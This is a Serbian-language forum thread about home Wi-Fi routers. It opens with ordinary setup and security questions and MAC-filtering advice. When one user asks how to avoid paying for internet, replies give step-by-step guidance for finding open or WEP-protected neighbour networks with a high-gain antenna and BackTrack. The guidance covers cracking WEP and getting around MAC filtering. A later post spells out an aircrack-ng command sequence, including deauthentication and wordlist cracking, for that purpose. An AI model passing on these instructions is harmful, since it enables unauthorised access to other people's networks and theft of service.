Wireless - Opsta diskusija.

probaj sa 192.168.0.1
ali nisam bas siguran da li ces tako imati podesavanja wifi rutera ,jer je on nakacen na sbb-ov
vidi,proveri,ako nema povezi direktno wifi na komp pa mu pristupi i promeni sifru ,posle prikaci na sbb-ov

e nađoh malopre i sama tu adresu što si mi sad poslao, ali opet ne mogu ništa da vidim, username ili password se ne poklapa..
videću ako budem znala :(
hvala u svakom slućaju

pozdrav, imam jedan problem,
u pitanju je ikom internet. Onaj njihov ruter ne podržava ni 2 kompa ni wifi, nabavili smo siemens. gigaset se515 dsl. Kad sve povezem mob. mi hvata wifi i sve radi normalno, ali komp preko kabla i laptop preko wifi se povežu ali ne dobijaju protok. Problem dns izbaca.a ip na mobu mi je 95.180.110.135 a na ova dva onaj standardni 192.168.1.2 i 3.. Šta i kako treba podesiti da bi sve to radilo? u tompson ulazim preko 192.168.100.1 a u simens 192.168.1.1 Mislim da je tompson mozda podnesena samo za 2 komada ( computers allowed by service provider:2 ) kako i gde to da promenim, mozda je do toga? hvala

Pozz svima,prvi put sam na nekom forumu tako da ... pomagajte :) Koristim ADSL telekom srbija ali zbog nemogucnosti placanja racuna pokusao bih ako je moguce nekako da nabudzim wireless opremu i da ne placam vise ovim lopovima mesecno 2 soma dinara :) Ako neko zna sta sve treba i gde mogu sve to da nadjem i kolko ce kostati, moze da mi odgovori. POZZZZZ

Pozz svima,prvi put sam na nekom forumu tako da ... pomagajte :) Koristim ADSL telekom srbija ali zbog nemogucnosti placanja racuna pokusao bih ako je moguce nekako da nabudzim wireless opremu i da ne placam vise ovim lopovima mesecno 2 soma dinara :) Ako neko zna sta sve treba i gde mogu sve to da nadjem i kolko ce kostati, moze da mi odgovori. POZZZZZ
pa kolko su adapteri soma i po-2,jesi siguran da imas u komsiluku neki otkljucan?

U kući imamo kompjuter i laptop, kompjuter je povezan sa ruterom kablom, a laptop na wirless i računar je zaštićen šifrom WEP Radio Type: 802.11g SSID
Dok kompjuter radi sam, internet je dobar. Ima dobar protok i sve ostalo, ne pitajte me šta, ne razumem se,ali rečeno mi je da ima. Čim uključim laptop internet postaje očajno loš na oba. Da li neko zna da mi napiše šta se dešava? Da li nam možda neko "pozajmljuje" internet, a mi neznamo? Promenili smo šifru, ali opet je isto.

U kući imamo kompjuter i laptop, kompjuter je povezan sa ruterom kablom, a laptop na wirless i računar je zaštićen šifrom WEP Radio Type: 802.11g SSID
Dok kompjuter radi sam, internet je dobar. Ima dobar protok i sve ostalo, ne pitajte me šta, ne razumem se,ali rečeno mi je da ima. Čim uključim laptop internet postaje očajno loš na oba. Da li neko zna da mi napiše šta se dešava? Da li nam možda neko "pozajmljuje" internet, a mi neznamo? Promenili smo šifru, ali opet je isto.

Ako je WEP zaštita i ako je neko rešio da pozajmljuje možete menjati šifru od danas do sutra. Wep se provaljuje dok si rekao keks. Ali ne mora to biti u pitanju. Koji je model rutera, brzina neta?

Ruter je od Telekoma TL-SF1005D a brzina je 1,5 mb.
Pa to je neko vreme bilo jako loše, pa je onda sve bilo u redu, pa sad opet jako koči. Danas opet loše otvara internet.
Pa jel ima neka jača zaštita? Kako da postavim da me ne kradu, jer ni mi u kući skoro kao da nemamo internet?

Udjes na ruter i nadjes "MAC FILTERING" Ubacis MAC adrese kojima hoces da dozvolis pristup internetu. Turn MAC Filtring ON AND ALLOW COMPUTER LISTED TO ACcESS THE NETWORK.

Da saznas MAC adresu svog racunara otvori CMD kucaj ipconfig/all "PHYSICAL ADDRESS"

Poslednja izmena:

http://www.backtrack-linux.org/

Kupi Wireless USB adapter TL WN 422 ili slican koji radi u BT4/5

Kupi jednu jacu Antenu tipa Grid 2.4Ghz 24db

Montiraj sve i instaliraj drajvere od kartice na PC

Okreci antenu i trazi najbolji signal i mrezu koja je Otvorena ili ima WEP zastitu

Sa otvorenim mrezama je lako, samo se konektujes preko DHCP a za WEP moras da Hakujes pomocu Backtrack Live DVD-a :)

Postoje i mreze koje su zasticene MAC adresom i one se mogu hakovati lako

WPA ne pokusavaj da hakujes ;)

Kupi Wireless USB adapter TL WN 422 ili slican koji radi u BT4/5

Kupi jednu jacu Antenu tipa Grid 2.4Ghz 24db

Montiraj sve i instaliraj drajvere od kartice na PC

Okreci antenu i trazi najbolji signal i mrezu koja je Otvorena ili ima WEP zastitu

Sa otvorenim mrezama je lako, samo se konektujes preko DHCP a za WEP moras da Hakujes pomocu Backtrack Live DVD-a :)

Postoje i mreze koje su zasticene MAC adresom i one se mogu hakovati lako

WPA ne pokusavaj da hakujes ;)

To je za njega spansko selo,da zna sve to da uradi verovatno ne bi trazio pomoc ovde :)
@djolestan Jeftinije ti je da pucas 2 soma jer ti za ovu opremu treba oko 8 soma + je pitanje dal i kakav ce ti internet biti...I ko ce ti sve to odraditi...

Puno si mu pomogao...kladim se da si ti haker za razbijanje wireless šifre ....valjda ćeš mu napisati i dos komande kada si mu već i program preporučio....

Evo ja cu da napisem komande.
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c (kanal) -w (ime fajla) --bssid (bssid) mon0
aireplay-ng -0 5 -a (bssid) mon0
aircrack-ng (ime fajla)*.cap -w (dcy lokacija)
:rtfm:

Back